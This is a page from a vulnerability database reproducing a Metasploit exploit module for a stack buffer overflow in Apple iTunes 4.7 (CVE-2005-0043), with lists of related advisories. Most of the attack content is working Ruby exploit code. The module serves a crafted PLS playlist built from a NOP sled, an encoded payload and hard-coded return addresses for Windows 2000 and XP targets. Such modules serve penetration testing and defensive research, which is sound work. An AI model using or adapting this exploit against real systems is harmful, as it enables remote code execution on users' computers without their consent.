Lucene search
K

Apple ITunes 4.7 Playlist Buffer Overflow

🗓️ 03 Feb 2007 13:09:45Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Apple ITunes 4.7 Playlist Buffer Overflow exploit allows remote attackers to execute arbitrary code via a malicious PLS fil

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Apple iTunes < 4.7.1 Playlist Buffer Overflow
18 Aug 200400:00
nessus
Tenable Nessus
iTunes < 4.7.1
13 Jan 200500:00
nessus
Circl
CVE-2005-0043
9 May 201000:00
circl
Check Point Advisories
Apple iTunes Playlists Name Handling Buffer Overflow (CVE-2005-0043)
30 Nov 200900:00
checkpoint_advisories
CVE
CVE-2005-0043
19 Jan 200505:00
cve
Cvelist
CVE-2005-0043
19 Jan 200505:00
cvelist
Exploit DB
Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
NVD
CVE-2005-0043
2 May 200504:00
nvd
Packet Storm
Apple ITunes 4.7 Playlist Buffer Overflow
26 Nov 200900:00
packetstorm
securityvulns
APPLE-SA-2005-01-11 iTunes 4.7.1
13 Jan 200500:00
securityvulns
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple ITunes 4.7 Playlist Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Apple ITunes 4.7
        build 4.7.0.42. By creating a URL link to a malicious PLS
        file, a remote attacker could overflow a buffer and execute
        arbitrary code. When using this module, be sure to set the
        URIPATH with an extension of '.pls'.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'MC',
      'References'     =>
        [
          [ 'CVE', '2005-0043' ],
          [ 'OSVDB', '12833' ],
          [ 'BID', '12238' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },

      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro English SP4',	{ 'Ret' => 0x75033083 } ],
          [ 'Windows XP Pro English SP2',		{ 'Ret' => 0x77dc2063 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2005-01-11',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    cruft   = rand(9).to_s

    sploit =  make_nops(2545) + payload.encoded + [target.ret].pack('V')

    # Build the HTML content
    content =  "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n"
    content << "File#{cruft}=http://#{sploit}"

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
EPSS0.69005
21